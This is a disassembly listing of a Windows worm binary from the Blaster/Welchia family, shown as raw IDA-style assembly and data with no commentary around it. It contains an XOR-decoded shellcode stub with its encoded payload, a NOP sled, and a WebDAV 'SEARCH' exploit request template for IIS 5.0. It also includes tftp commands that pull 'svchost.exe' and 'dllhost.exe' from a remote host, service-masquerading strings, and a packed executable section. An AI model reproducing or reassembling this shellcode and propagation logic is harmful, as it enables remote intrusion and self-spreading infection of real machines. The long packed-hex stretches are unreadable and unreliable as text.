dword_40547C dd 3000005h, 10hdword_405484 dd 3E8h dd 0E5h, 3D0h, 40001h, 60005h, 1, 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 2 dup(0)
dword_4057DC dd 20h ; sub_402170+29�w
dword_4057E0 dd 0 dword_4057E4 dd 20h ; sub_402170+2E�w
dword_4057E8 dd 5C005Ch aC1234561111111: ; DATA XREF: sub_402170+7B�o
unicode 0, <\C$\123456111111111111111.doc>,0
aFxnbfxfxnbfxfx: ; DATA XREF: sub_402170+55�o
unicode 0, <FXNBFXFXNBFXFXFXFX>
dword_40584C dd 7F08321Ah db 0CCh
db 0E0h, 0FDh, 7Fh
db 0CCh
db 0E0h, 0FDh, 7Fh
db 126h dup(90h)
; ---------------------------------------------------------------------------
loc_40597E: ; DATA XREF: sub_401F30+13C�o
jmp short loc_405990
; =============== S U B R O U T I N E =======================================
sub_405980 proc far ; CODE XREF: sub_405980:loc_405990�p
pop edx
dec edx
xor ecx, ecx
mov cx, 176h
loc_405988: ; CODE XREF: sub_405980+C�j
xor byte ptr [edx+ecx], 99h
loop loc_405988
jmp short loc_405995
; ---------------------------------------------------------------------------
loc_405990: ; CODE XREF: seg000:loc_40597E�j
call near ptr sub_405980
loc_405995: ; CODE XREF: sub_405980+E�j
jo short loc_4059F8
cdq
cdq
cdq
retn
; ---------------------------------------------------------------------------
db 21h
dd 0E6646995h, 0E9129912h, 0D9123485h, 12411291h, 6A9AA5EAh
dd 9AE1EF12h, 0B9E7126Ah, 0D712629Ah, 0CF74AA8Dh, 0A612C8CEh
dd 6B12629Ah, 6AC097F3h, 0C091ED3Fh, 9D5E1AC6h, 0C0707BDCh
dd 5412C7C6h, 9ABDDF12h, 9A78485Ah, 0FF50AA58h, 0DF129112h
dd 585A9A85h, 589A9B78h, 5A9A9912h
; ---------------------------------------------------------------------------
loc_4059F8: ; CODE XREF: sub_405980:loc_405995�j
adc ah, [ebx+12h]
outsb
sbb bl, [edi-69h]
adc cl, [ecx-0Dh]
call far ptr 9999h:99ED71C0h
sbb bl, [edi-6Ch]
retf
sub_405980 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0CFh, 66h, 0CEh
dd 4112C365h, 71C09AF3h, 999999F8h, 12DD751Ah, 0C089F36Dh
dd 7B179D10h, 0C9C9C962h, 0F398F3C9h, 6DCE669Bh, 0C7104112h
dd 0A5C710A1h, 0FFD9C710h, 98B5DF5Eh, 89DE1498h, 59AACFC9h
dd 0F3C9C9C9h, 14C9C998h, 9B5EA5CEh, 99FDF4FAh, 0CE66C9CBh
dd 9B9E5E71h, 5E9B9999h, 0FAFA9DDEh, 89F3FAFAh, 0CE66CACEh
dd 0CE66CA61h, 0CE66C965h, 3559AA75h, 60EC591Ch, 0CACFCBC8h
dd 0C0C34B66h, 0AA777B32h, 9A715A59h, 0DE666666h, 0EBC9EDFCh
dd 0FDD8FAF6h, 0EAFCEBFDh, 0EBDA99EAh, 0FCEDF8FCh, 0FAF6EBC9h
dd 0D8EAEAFCh, 0F0E1DC99h, 0EBF1CDEDh, 99FDF8FCh, 0FDF8F6D5h
dd 0EBFBF0D5h, 0D8E0EBF8h, 0ABEAEE99h, 99ABAAC6h, 0CAD8CACEh
dd 0FCF2FAF6h, 0FA99D8EDh, 0FCF7F7F6h, 0FA99EDFAh, 0FCEAF6F5h
dd 0F2FAF6EAh, 99EDFCh
dword_405AF4 dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0 dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 0
dd offset aILoveMyWifeBab ; "=========== I love my wife & baby :)~~~"...
aCopyDllcacheTf db 'copy dllcache\tftpd.exe wins\svchost.exe',0Ah
; DATA XREF: sub_401C80+175�o
db 0Dh,0
align 4
aWinsDllhost_ex db 'wins\DLLHOST.EXE',0Ah ; DATA XREF: sub_401C80+1AB�o
; sub_401C80+1BD�o
db 0Dh,0
align 4
word_405B68 dw 29Ah ; DATA XREF: sub_401990+5A�w
; sub_401990+81�r ...
align 4
aRpctftpd db 'RpcTftpd',0 ; DATA XREF: sub_401280+41�o
; sub_401280+E7�o ...
align 4
aRpcpatch db 'RpcPatch',0 ; DATA XREF: sub_401280+37�o
; sub_401660+57�o ...
align 4
aDirDllcacheTft db 'dir dllcache\tftpd.exe',0Ah ; DATA XREF: sub_401C80+11B�o
db 0Dh,0
align 10h
dword_405BA0 dd 4 ; sub_402880:loc_4028F6�r
byte_405BA4 db 3Dh ; DATA XREF: sub_401100:loc_40115A�r
db 3Dh, 2 dup(0CAh)
dd 0D2D2CBCAh, 0DADAD3D3h, 0DCDBh
aDirWinsDllhost db 'dir wins\dllhost.exe',0Ah ; DATA XREF: sub_401C80+D2�o
db 0Dh,0
align 4
aGetHttp1_1Acce db 'GET / HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_402C40+B5�o
db 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*',0Dh
db 0Ah
db 'User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',0Dh,0Ah
db 'Host: ',0
align 4
aConnectionKeep db 0Dh,0Ah ; DATA XREF: sub_402C40+95�o
db 'Connection: Keep-Alive',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aILoveMyWifeBab db '=========== I love my wife & baby :)~~~ Welcome Chian~~~ Notice'
; DATA XREF: seg000:00405B24�o
db ': 2004 will remove myself:)~~ sorry zhongli~~~=========== wins',0
align 4
aHttpDownload_6 db 'http://download.microsoft.com/download/6/9/5/6957d785-fb7a-4ac9-b'
; DATA XREF: seg000:00405430�o
db '1e6-cb99b62f9f2a/Windows2000-KB823980-x86-KOR.exe',0
align 4
aHttpDownload_5 db 'http://download.microsoft.com/download/5/8/f/58fa7161-8db3-4af4-b'
; DATA XREF: seg000:0040542C�o
db '576-0a56b0a9d8e6/Windows2000-KB823980-x86-CHT.exe',0
align 10h
aHttpDownload_4 db 'http://download.microsoft.com/download/2/8/1/281c0df6-772b-42b0-9'
; DATA XREF: seg000:00405428�o
db '125-6858b759e977/Windows2000-KB823980-x86-CHS.exe',0
align 4
aHttpDownload_0 db 'http://download.microsoft.com/download/0/1/f/01fdd40f-efc5-433d-8'
; DATA XREF: seg000:off_405424�o
db 'ad2-b4b9d42049d5/Windows2000-KB823980-x86-ENU.exe',0
align 4
aHttpDownload_3 db 'http://download.microsoft.com/download/e/3/1/e31b9d29-f650-4078-8'
; DATA XREF: seg000:00405420�o
db 'a76-3e81eb4554f6/WindowsXP-KB823980-x86-KOR.exe',0
align 4
aHttpDownload_2 db 'http://download.microsoft.com/download/2/3/6/236eaaa3-380b-4507-9'
; DATA XREF: seg000:0040541C�o
db 'ac2-6cec324b3ce8/WindowsXP-KB823980-x86-CHT.exe',0
align 10h
aHttpDownload_1 db 'http://download.microsoft.com/download/a/a/5/aa56d061-3a38-44af-8'
; DATA XREF: seg000:00405418�o
db 'd48-85e42de9d2c0/WindowsXP-KB823980-x86-CHS.exe',0
align 4
aHttpDownload_m db 'http://download.microsoft.com/download/9/8/b/98bcfad8-afbc-458f-a'
; DATA XREF: seg000:off_405414�o
db 'aee-b7a52a983f01/WindowsXP-KB823980-x86-ENU.exe',0
align 4
aTftpISGetSvcho db 'tftp -i %s get svchost.exe wins\SVCHOST.EXE',0Ah
; DATA XREF: sub_401210+48�o
db 0Dh,0
align 4
aTftpISGetDllho db 'tftp -i %s get dllhost.exe wins\DLLHOST.EXE',0Ah
; DATA XREF: sub_401210+34�o
db 0Dh,0
align 4
aNetworkConnect db 'Network Connections Sharing',0 ; DATA XREF: sub_4015E0+57�o
aSvchost_exe db 'svchost.exe',0 ; DATA XREF: sub_4015E0+52�o
; sub_4023E0+59�o
aMsdtc db 'MSDTC',0 ; DATA XREF: sub_4015E0+4D�o
align 4
aSWinsSvchost_e db '%s\wins\svchost.exe',0 ; DATA XREF: sub_4015E0+2D�o
aSDllcacheTftpd db '%s\dllcache\tftpd.exe',0 ; DATA XREF: sub_4015E0+19�o
align 4
aWinsClient db 'WINS Client',0 ; DATA XREF: sub_401660+52�o
aDllhost_exe db 'DLLHOST.EXE',0 ; DATA XREF: sub_401660+4D�o
; sub_401C80+EC�o
aBrowser db 'Browser',0 ; DATA XREF: sub_401660+48�o
aSWinsDllhost_e db '%s\wins\DLLHOST.EXE',0 ; DATA XREF: sub_401660+24�o
aSNOZQ db '%s -n -o -z -q',0 ; DATA XREF: sub_401780+15C�o
align 4
dword_4061A8 dd 53637052h dword_4061AC dd 69767265h dword_4061B0 dd 61506563h dword_4061B4 dd 652E6B63h word_4061B8 dw 6578h ; DATA XREF: sub_401780+102�r
byte_4061BA db 0 ; DATA XREF: sub_401780+10D�r
align 4
dword_4061BC dd 74737973h, 32336D65h, 3Eh ; sub_401C80+8E�o ...
aTimeoutOccurre db 'Timeout occurred',0 ; DATA XREF: sub_401B90+95�o
align 4
aTransferSucces db 'Transfer successful',0 ; DATA XREF: sub_401B90+86�o
aTftpd_exe db 'TFTPD.EXE',0 ; DATA XREF: sub_401C80+148�o
align 4
aTftpd_exe_0 db 'tftpd.exe',0 ; DATA XREF: sub_401C80+135�o
align 4
aDllhost_exe_0 db 'dllhost.exe',0 ; DATA XREF: sub_401C80+103�o
aMicrosoftWindo db 'Microsoft Windows',0 ; DATA XREF: sub_401C80+77�o
align 4
aMicrosoft_com db 'microsoft.com',0 ; DATA XREF: sub_401E80�o
align 4
word_406238 dw 0A0Dh ; DATA XREF: sub_401F30+17E�r
byte_40623A db 0 ; DATA XREF: sub_401F30+185�r
align 4
aHttp1_1Host127 db ' HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_401F30+100�o
db 'Host: 127.0.0.1',0Dh,0Ah
db 'Content-Type: text/xml',0Dh,0Ah
db 'Content-length: 377',0Dh,0Ah
db 0Dh,0Ah
db 'YXYX',0
aSearch db 'SEARCH /',0 ; DATA XREF: sub_401F30+A�o
align 4
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_4022A0+1C�o
aSoftwareMicr_1 db 'SOFTWARE\Microsoft\Updates\Windows XP\SP2\KB823980',0
; DATA XREF: sub_402390+2D�o
align 10h
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Updates\Windows XP\SP1\KB823980',0
; DATA XREF: sub_402390:loc_4023AC�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Updates\Windows 2000\SP5\KB823980',0
; DATA XREF: sub_402390+8�o
align 4
aManagesNetwork db 'Manages network configuration by updating DNS names IP address.',0
; DATA XREF: sub_4023E0+D1�o
aSWinsS db '%s\wins\%s',0 ; DATA XREF: sub_4023E0+4D�o
align 4
aDSWins db '-d%s\wins',0 ; DATA XREF: sub_402540+33�o
align 4
aRpcpatch_mutex db 'RpcPatch_Mutex',0 ; DATA XREF: sub_4027B0�o
align 4
aSMsblast_exe db '%s\msblast.exe',0 ; DATA XREF: sub_402A00+63�o
align 4
aMsblast db 'msblast',0 ; DATA XREF: sub_402A00+8�o
a411 db '411',0 ; DATA XREF: sub_402C40+20A�o
aSearchHttp1_1H db 'SEARCH / HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_402C40+19E�o
db 'Host: %s',0Dh,0Ah
db 0Dh,0Ah,0
aServerMicrosof db 'Server: Microsoft-IIS/5.0',0 ; DATA XREF: sub_402C40+13F�o
align 4
aSSS db '%s%s%s',0 ; DATA XREF: sub_402C40+BA�o
align 4
dword_406414 dd 1 align 10h
dword_406420 dd 0 ; sub_402B20+CA�r
dword_406424 dd 0 ; sub_401F30+50�r ...
dword_406428 dd 0 ; sub_402170+100�w
dword_40642C dd 0 ; sub_4020E0+13�r
dword_406430 dd 10h dup(0) ; sub_402AB0+3F�o ...
dword_406470 dd 0 ; sub_402130+35�w ...
align 8
dword_406478 dd 0 align 10h
dword_406480 dd 0 ; sub_402170+C7�w
dd 1Bh dup(0)
dword_4064F0 dd 0 ; sub_402170+D3�w
dword_4064F4 dd 0 ; sub_402170+DF�w
dd 0Bh dup(0)
dword_406524 dd 0 ; sub_402170+EF�w
dword_406528 dd 0 ; sub_402170+F9�w
dd 5 dup(0)
dword_406540 dd 0 ; sub_402170+11E�w
dd 2Eh dup(0)
dword_4065FC dd 0 ; sub_402170+124�w
dd 74h dup(0)
dword_4067D0 dd 0 dword_4067D4 dd 0 dword_4067D8 dd 0 dword_4067DC dd 0 dword_4067E0 dd 0B3h dup(0) dword_406AAC dd 0Fh dup(0) dword_406AE8 dd 146h dup(0) seg000 ends
; Section 2. (virtual address 00007000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00007000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
seg001 segment para public 'CODE' use32
assume cs:seg001
;org 407000h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
dword_407000 dd 11Ch dup(0) dword_407470 dd 0 ; sub_4020E0+33�r
dword_407474 dd 0 ; sub_402170+10A�w
dword_407478 dd 8 dup(0) ; sub_401210+43�o ...
aCWindowsSystem db 'C:\WINDOWS\system32',0 ; DATA XREF: sub_4011C0+14�o
; sub_4015E0+14�o ...
dd 3Dh dup(0)
dword_4075A0 dd 0 ; sub_401280+9C�r ...
dword_4075A4 dd 0 ; sub_401470+136�r ...
dword_4075A8 dd 20h dup(0) ; sub_401C80+18C�o
dword_407628 dd 20h dup(0) ; sub_401C80+15C�o
dword_4076A8 dd 0 ; seg000:00402932�w
dword_4076AC dd 0 dword_4076B0 dd 0 dword_4076B4 dd 0 dword_4076B8 dd 0 dword_4076BC dd 0FFFFFFFFh dword_4076C0 dd 0FFFFFFFFh dword_4076C4 dd 0 dd 24Eh dup(0)
dd 0E0h, 3060h, 74654701h, 7473614Ch, 6F727245h, 49010072h
dd 7265746Eh, 6B636F6Ch, 65446465h, 6D657263h, 746E65h
dd 6F6C4701h, 416C6162h, 636F6C6Ch, 6C470100h, 6C61626Fh
dd 65657246h, 704F0100h, 72506E65h, 7365636Fh, 47010073h
dd 69467465h, 7441656Ch, 62697274h, 73657475h, 53010041h
dd 69467465h, 7441656Ch, 62697274h, 73657475h, 47010041h
dd 6F4D7465h, 656C7564h, 646E6148h, 41656Ch, 6D6E5501h
dd 69567061h, 664F7765h, 656C6946h, 72430100h, 65746165h
dd 6574754Dh, 1004178h, 65746E49h, 636F6C72h, 4964656Bh
dd 6572636Eh, 746E656Dh, 6F4C0100h, 416C6163h, 636F6C6Ch
dd 6F4C0100h, 466C6163h, 656572h, 74654701h, 73726556h
dd 6E6F69h, 74654701h, 73726556h, 456E6F69h, 1004178h
dd 43746547h, 65727275h, 7250746Eh, 7365636Fh, 47010073h
dd 454F7465h, 50434Dh, 74654701h, 74737953h, 65446D65h
dd 6C756166h, 49434C74h, 47010044h, 6F4D7465h, 656C7564h
dd 656C6946h, 656D614Eh, 54010041h, 696D7265h, 6574616Eh
dd 636F7250h, 737365h, 69615701h, 726F4674h, 676E6953h
dd 624F656Ch, 7463656Ah, 6F430100h, 69467970h, 41656Ch
dd 74654701h, 61636F4Ch, 6D69546Ch, 45010065h, 50746978h
dd 65636F72h, 1007373h, 54746547h, 436B6369h, 746E756Fh
dd 72430100h, 65746165h, 65726854h, 1006461h, 65656C53h
dd 46010070h, 43656572h, 6F736E6Fh, 100656Ch, 53746547h
dd 65747379h, 7269446Dh, 6F746365h, 417972h, 65724301h
dd 54657461h, 686C6F6Fh, 33706C65h, 616E5332h, 6F687370h
dd 50010074h, 65636F72h, 32337373h, 73726946h, 50010074h
dd 65636F72h, 32337373h, 7478654Eh, 6C430100h, 4865736Fh
dd 6C646E61h, 43010065h, 74616572h, 6F725065h, 73736563h
dd 44010041h, 74656C65h, 6C694665h, 4165h, 0EDh, 3000h
dd 61684301h, 5365676Eh, 69767265h, 6F436563h, 6769666Eh
dd 1004132h, 72657551h, 72655379h, 65636976h, 666E6F43h
dd 41326769h, 74530100h, 53747261h, 69767265h, 416563h
dd 6C654401h, 53657465h, 69767265h, 1006563h, 69676552h
dd 72657473h, 76726553h, 43656369h, 486C7274h, 6C646E61h
dd 417265h, 74655301h, 76726553h, 53656369h, 75746174h
dd 53010073h, 74726174h, 76726553h, 43656369h, 446C7274h
dd 61707369h, 65686374h, 1004172h, 72657551h, 72655379h
dd 65636976h, 74617453h, 1007375h, 72657551h, 72655379h
dd 65636976h, 666E6F43h, 416769h, 61684301h, 5365676Eh
dd 69767265h, 6F436563h, 6769666Eh, 41010041h, 73756A64h
dd 6B6F5474h, 72506E65h, 6C697669h, 73656765h, 704F0100h
dd 43536E65h, 616E614Dh, 41726567h, 72430100h, 65746165h
dd 76726553h, 41656369h, 6C430100h, 5365736Fh, 69767265h
dd 61486563h, 656C646Eh, 704F0100h, 65536E65h, 63697672h
dd 1004165h, 4F676552h, 4B6E6570h, 78457965h, 52010041h
dd 6C436765h, 4B65736Fh, 1007965h, 6E65704Fh, 636F7250h
dd 54737365h, 6E656B6Fh, 6F4C0100h, 70756B6Fh, 76697250h
dd 67656C69h, 6C615665h, 416575h, 0FA00h, 305000h, 63490100h
dd 6C43706Dh, 4865736Fh, 6C646E61h, 49010065h, 43706D63h
dd 74616572h, 6C694665h, 49010065h, 53706D63h, 45646E65h
dd 6F6863h, 10300h, 30F000h, 78650100h, 1007469h, 7063585Fh
dd 6C694674h, 726574h, 675F5F01h, 616D7465h, 72616E69h
dd 1007367h, 696E695Fh, 72657474h, 7301006Dh, 74737274h
dd 73010072h, 646E6172h, 3F3F0100h, 41594032h, 49584150h
dd 1005A40h, 5F705F5Fh, 6E695F5Fh, 6E657469h, 5F010076h
dd 7465735Fh, 72657375h, 6874616Dh, 727265h, 64615F01h
dd 7473756Ah, 6964665Fh, 5F010076h, 5F5F705Fh, 6D6D6F63h
dd 65646Fh, 72707301h, 66746E69h, 74730100h, 68637272h
dd 5F010072h, 5F5F705Fh, 646F6D66h, 5F010065h, 7465735Fh
dd 7070615Fh, 7079745Fh, 5F010065h, 65637865h, 685F7470h
dd 6C646E61h, 337265h, 6F635F01h, 6F72746Eh, 70666Ch, 78655F01h
dd 1007469h, 40333F3Fh, 50584159h, 5A405841h, 61720100h
dd 100646Eh, 7274735Fh, 706D6369h, 10E0000h, 319C0000h
dd 55010000h, 6F444C52h, 6F6C6E77h, 6F546461h, 656C6946h
dd 19000041h, 48000001h, 1000031h, 74697845h, 646E6957h
dd 4573776Fh, 24000078h, 50000001h, 0FF000031h, 4FF0017h
dd 39FF00h, 0FF000CFFh, 15FF0034h, 13FF00h, 0FF0010FFh
dd 9FF0003h, 2FF00h, 0FF0074FFh, 1FF000Dh, 8FF00h, 0FF0073FFh
dd 0BFF000Eh, 0
dd 45500000h, 14C0000h, 20080003h, 9A08h, 0
dd 0E00000h, 10B010Fh, 30000006h, 40000000h, 0
dd 2FCC0000h, 10000000h, 40000000h, 0
dd 10000040h, 10000000h, 40000h, 0
dd 40000h, 0
dd 80000000h, 10000000h, 0
dd 30000h, 0
dd 10000010h, 0
dd 10000010h, 0
dd 100000h, 2 dup(0)
dd 41B40000h, 0A00000h, 14h dup(0)
dd 40000000h, 1A40000h, 6 dup(0)
dd 742E0000h, 747865h, 213A0000h, 10000000h, 30000000h
dd 10000000h, 3 dup(0)
dd 200000h, 722E6000h, 61746164h, 9B00000h, 40000000h
dd 10000000h, 40000000h, 3 dup(0)
dd 400000h, 642E4000h, 617461h, 26C80000h, 50000000h, 20000000h
dd 50000000h, 3 dup(0)
dd 400000h, 7000C000h, 43F80000h, 2 dup(755E0000h), 8DD71262h
dd 0CECF74AAh, 0BA612C8h, 0C097F36Bh, 91ED3F6Ah, 5E1AC6C0h
dd 0D97BDC9Dh, 70B7FFFEh, 5412C707h, 9ABDDF12h, 9A78485Ah
dd 0FF50AA58h, 850D9112h, 7B5ADFFFh, 0E9B7858h, 63120853h
dd 5F1A6E12h, 0F3491297h, 37DAC09Ah, 0ED71DCD8h, 60940C6Eh
dd 0C365CE66h, 0FFFEEF68h, 75F812F9h, 0F36D12DDh, 9D10C089h
dd 0C9627B17h, 0F398F300h, 0BDB2FF9Bh, 216D226Dh, 2A1C710h
dd 5EFFD9A5h, 9898B5DFh, 0FEC5BFFBh, 0C989DE14h, 2159AACFh
dd 0A5CE1403h, 0F4FA9B5Eh, 0D9CB99FDh, 7EDFB9BBh, 9E5E71CEh
dd 5E9B499Bh, 0FA9DDEh, 13CACE4Ch, 6EBADFDAh, 1B650361h
dd 1C353275h, 0C860EC59h, 0CBEDFF78h, 0C34B11DFh, 777B32C0h
dd 669A715Ah, 0EDFCDE00h, 0FAF6EBC9h, 6F7BBFD8h, 0EBFDFDFFh
dd 99EAEAFCh, 0EDF805DAh, 0D80D11FCh, 0F0E1DC99h, 0DDBFDBEDh
dd 13F1CDDCh, 4F6D563h, 0EBFBF0D5h, 17E0EBF8h, 0BB797FEEh
dd 0C6ABEAFDh, 6399ABAAh, 0F229CAD8h, 0F6FAEDFCh, 0FAFCF7F7h
dd 6FB58D24h, 0F6F5FADFh, 99143AEAh, 0D23F2057h, 0B72D20C8h
dd 0C2A88h, 81268002h, 0C8C28F7h, 2F84BF07h, 4DD137F1h
dd 642079D2h, 61636C6Ch, 745C65C2h, 0D1BFA37Dh, 2E347466h
dd 20657865h, 5C732877h, 0E9987673h, 6F14B12Bh, 0DE0A10D3h
dd 0F3D01C13h, 4C4C44FFh, 54534F48h, 4558452Eh, 0EEF9149Ah
dd 544985BDh, 500B5338h, 68637461h, 0C5B656F7h, 495A7241h
dd 0EDFFB300h, 3D3D9F2Fh, 0D2CB00CAh, 0DAD3D3D2h, 2FDCDBDAh
dd 62E607D6h, 47773463h, 68525445h, 20FE2D8Bh, 50545448h
dd 6031D32Fh, 6F46A341h, 7495D054h, 29E8203Ah, 85A8DB07h
dd 0A2C0980h, 716D2D78h, 6278F2D8h, 10707469h, 1667AF6Ah
dd 0B8767DBh, 2F2A0C70h, 0B355412Ah, 0F6DD5B6Fh, 14412D72h
dd 0ED4D456Eh, 2F616F69h, 0E154AD34h, 28202E42h, 0FEBE350Eh
dd 0B446A16Dh, 53183B06h, 35204549h, 0BF17352Eh, 5709DB51h
dd 73773A94h, 0FC383920h, 5CD7B685h, 0C3359948h, 0DA67430Bh
dd 6EA190CDh, 4B116E30h, 15A89465h, 7B53D46Ah, 0FA35177Fh
dd 0DF0467B2h, 20492000h, 0D6EA5B7Ah, 6D2019BDh, 766E179h
dd 62222026h, 6D42B90Bh, 7E293A7Bh, 765F2000h, 2EC76E78h
dd 584315B5h, 4E116E61h, 6563546Fh, 5D0B7368h, 34DC3220h
dd 4220A032h, 605B36EFh, 6CBB416Dh, 0CC8F3866h, 6FF6EDB5h
dd 7A437272h, 76677D68h, 88686F36h, 0B1480C22h, 0EA982D74h
dd 2F3A765Eh, 0AE6EBE2Fh, 85B96D80h, 0CA56A856h, 712E8C38h
dd 93FB51BDh, 2F362F16h, 5352F39h, 3764375Ah, 1BFC2FF5h
dd 62662D59h, 342D6137h, 622D39B7h, 2D366531h, 2AB7D1B0h
dd 36627A3Fh, 326C6632h, 0A105DFC2h, 30980C27h, 38424B2Dh
dd 0C0153332h, 8B76F0Eh, 4B253878h, 73B1524Fh, 0A5BDB52Fh
dd 662F386Fh, 37C83805h, 72FD3631h, 2D31FDD9h, 33626438h
dd 35346673h, 35613037h, 2BE46236h, 3904BDACh, 73803864h
dd 0F6544843h, 322266B7h, 31380531h, 66643063h, 5ADED53Eh
dd 323737FBh, 4C037362h, 0F6323139h, 3D4DB590h, 65536254h
dd 0DF731839h, 5376113Ch, 312F30E7h, 64663130h, 2F6B6D64h
dd 663034FFh, 6366652Dh, 64333335h, 0EC321CF1h, 856B6DB0h
dd 65175C34h, 73350534h, 0AF90891Bh, 0EE554E45h, 742B6D33h
dd 33657577h, 0C5325C31h, 0FF4735EAh, 7C685706h, 335B73DAh
dd 65313865h, 8353462h, 35E49C21h, 50586634h, 639B0CDh
dd 47335B42h, 43723641h, 33ED0D6Bh, 355B4864h, 5DB63730h
dd 6361F280h, 32336932h, 840733ECh, 38D8461Dh, 0C773CD73h
dd 615DD68Eh, 2B033501h, 0BB433064h, 3379470Eh, 44383361h
dd 35EC344Dh, 860AC265h, 6564590Bh, 0EB73EE02h, 53B90A18h
dd 5624339h, 46ED6B5Ah, 0D666329h, 35086C64h, 0E7EB4075h
dd 2D6D7338h, 0AC233539h, 1D252B70h, 73F16633h, 92D03FFh
dd 207100CDh, 2520692Dh, 23C2073h, 6567F203h, 6E202074h
dd 80435653h, 2F96CAC0h, 8062D629h, 0CF9E20C0h, 0EB2DBE24h
dd 6B2677D6h, 5338A920h, 0F0726168h, 2BDD80D6h, 6C0067h
dd 435444ECh, 4CD0246Fh, 13FA4207h, 256EF6Ah, 49572BC6h
dd 0A158534Eh, 7AD03580h, 41770046h, 6E02B258h, 4B60F372h
dd 0B6CB2C1Bh, 6E2DB71Bh, 717A6F02h, 18DB5D6Dh, 762A532Fh
dd 6B5F50ECh, 9ED5A36Eh, 78797358h, 633E2CECh, 817B605Ah
dd 6F65BC54h, 0F36FE875h, 31EDB475h, 6365EDD8h, 55617254h
dd 6ED83566h, 752D2C1Dh, 750A7309h, 3046136Ch, 1D36F730h
dd 0A31F6144h, 96E08604h, 0D0CFE320h, 370425C0h, 4D0FE31Fh
dd 0B9706020h, 0E706EC6Ah, 371B6C1Ah, 4710011Ch, 0BBC0CDE0h
dd 542DEF74h, 0A9E7079h, 6D2F7478h, 4E95976Fh, 67046C17h
dd 33196874h, 683F6FC2h, 58590641h, 45530001h, 0ADC55241h
dd 0C2835ED0h, 0CE7DECBBh, 1F0AD685h, 0F683504Bh, 0EC9DC52Eh
dd 4F136DB6h, 452257BCh, 555CA05Ch, 0B6850618h, 3A4F61C0h
dd 0BC61D879h, 500941D1h, 455C32h, 0C845AF33h, 0A793114h
dd 357496AFh, 0CB6E4F35h, 40266C60h, 634B6E1Ch, 0C7C1D766h
dd 8E6769C2h, 0C6204E61h, 366E4575h, 20518EC7h, 6D2B1044h
dd 30205049h, 1C970D19h, 2E9D7264h, 580F2507h, 2D70DB04h
dd 5F2B0D64h, 0C4B0754Dh, 7B480C31h, 617A736Dh, 8360A970h
dd 0D10C00AEh, 96893131h, 9B439212h, 6B276E34h, 24411EDh
dd 492DDA0Eh, 0D68518BDh, 0B41A5349h, 422001D3h, 4030C80h
dd 88580101h, 42A8CB00h, 0A5FAE052h, 0FC0B1432h, 74654701h
dd 0FB60054Ch, 724544ADh, 0D726F72h, 4A00A549h, 6C72FFC1h
dd 656B636Fh, 63654464h, 0B7EE6152h, 1123BBE6h, 416C6162h
dd 400C186Ch, 46DB6EDBh, 4F0B651Bh, 38501F70h, 1CC6005Fh
dd 0B0464964h, 72747441h, 0F6CB256Fh, 74756269h, 27534113h
dd 0F6FB9B82h, 75646F4Dh, 6E614815h, 55111B64h, 0F7B6D06Eh
dd 695693B7h, 664F7765h, 5D43102Dh, 2AAFB09h, 9441F676h
dd 0C936B25Eh, 104C6E49h, 22C0B93h, 5D92CDF4h, 330BE156h
dd 450F6701h, 24437878h, 1FD8C03Dh, 454FB358h, 950434Dh
dd 0DDA17B53h, 66F7574Eh, 43149C61h, 0BDAB4449h, 97017F7Dh
dd 0AD6D614Eh, 696D5254h, 9ED0B06Eh, 57459FCCh, 3EE66961h
dd 0B780B553h, 4F25E202h, 36486A62h, 0C3C20D7Bh, 0A1783539h
dd 3CCDB096h, 8B6D6954h, 0DD158069h, 0D9B5B7B3h, 0F7D3752Ch
dd 64066854h, 0C825B5Eh, 670B13Ch, 5C3B2FD7h, 6F733E02h
